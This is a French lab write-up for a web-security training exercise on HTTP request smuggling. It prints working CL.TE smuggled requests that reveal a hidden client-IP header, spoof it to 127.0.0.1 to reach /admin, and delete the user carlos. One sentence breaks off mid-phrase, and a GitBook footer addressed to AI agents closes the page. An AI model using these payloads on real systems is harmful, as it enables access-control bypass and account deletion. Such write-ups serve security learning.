> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/request-smuggling/discovery-of-rewriting-by-the-front-end.md).

# Découverte de réécriture par le front-end

### Exploiter le HTTP Request Smuggling pour révéler la réécriture des requêtes côté front-end

Le site repose sur un serveur front-end et un serveur back-end. Le front-end\*\* n'accepte pas l'encodage chunké\*\*. / L'accès au panneau d'administration /admin est réservé aux utilisateurs de **127.0.0.1**. / Avant de transférer les requêtes au back-end, le front-end \*\* ajoute un en-tête personnalisé contenant l'adresse IP du client\*\*. Ce comportement ressemble au classique X-Forwarded-For, mais le nom de l'en-tête est différent.

L'objectif est double :

1. **Dirigez une requête** pour révéler le nom de cet en-tête ajouté par le front-end.
2. **Envoyez une requête dissimulée** contenant cet en-tête, en le forçant à la valeur 127.0.0.1, pour accéder au panneau d'administration et supprimer l'utilisateur carlos.

<figure><img src="/files/e26042a9bb227f4765d396aed80984b5014acbe2" alt=""><figcaption></figcaption></figure>

#### **Analyse comportementale**

* Le champ envoyé dans le paramètre de recherche est renvoyé dans la réponse, montrant que nous pouvons l'utiliser pour observer les effets de nos injections.
* Envoi :

```http
Content-Length: 5
Transfer-Encoding: chunked

0


```

la requête est traitée sans erreur (200 OK), ce qui confirme que **le front-end interprète Content-Length**, tandis que **le back-end ignore Transfer-Encoding**.

* Lors de la dissimulation d'une requête POST supplémentaire :

```http
Content-Length: 55
Transfer-Encoding: chunked

0

POST / HTTP/1.1
Content-Length: 13

search=test
```

les octets excédentaires (ici,

* En augmentant Content-Length à 125, la réponse révèle l'en-tête ajouté par le front-end. / Cet en-tête est :

```http
Content-Length: 125
```

<figure><img src="/files/88b723d508a70c16937909b0db61b98f45d6adb1" alt=""><figcaption></figcaption></figure>

<sub>X-KwWCmS-Ip</sub>

<figure><img src="/files/37a01bd85442ddc4daf404b312596cb015855ed9" alt=""><figcaption></figcaption></figure>

#### **Accès au panneau d'administration**

En forgeant une requête dissimulée qui inclut cet en-tête forcé à **127.0.0.1**, vous accédez à /admin :

```http
POST / HTTP/1.1
Host: 0a740022030a5b81820ebfb900ae0054.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Transfer-Encoding: chunked

0

POST /admin HTTP/1.1
X-KwWCmS-Ip: 127.0.0.1
Content-Length: 13

search=test
```

<figure><img src="/files/d7f5847626fc2c02be218aaea633861512f970d4" alt=""><figcaption></figcaption></figure>

#### **Suppression de l'utilisateur Carlos**

Une deuxième requête dissimulée permet d'appeler directement le point de terminaison de suppression :

```http
POST / HTTP/1.1
Host: 0a740022030a5b81820ebfb900ae0054.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Transfer-Encoding: chunked

0

POST /admin/delete?username=carlos HTTP/1.1
X-KwWCmS-Ip: 127.0.0.1
Content-Length: 13

search=test
```

L'utilisateur carlos est alors supprimé via le back-end, ce qui donne l'impression d'une requête interne autorisée.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/request-smuggling/discovery-of-rewriting-by-the-front-end.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
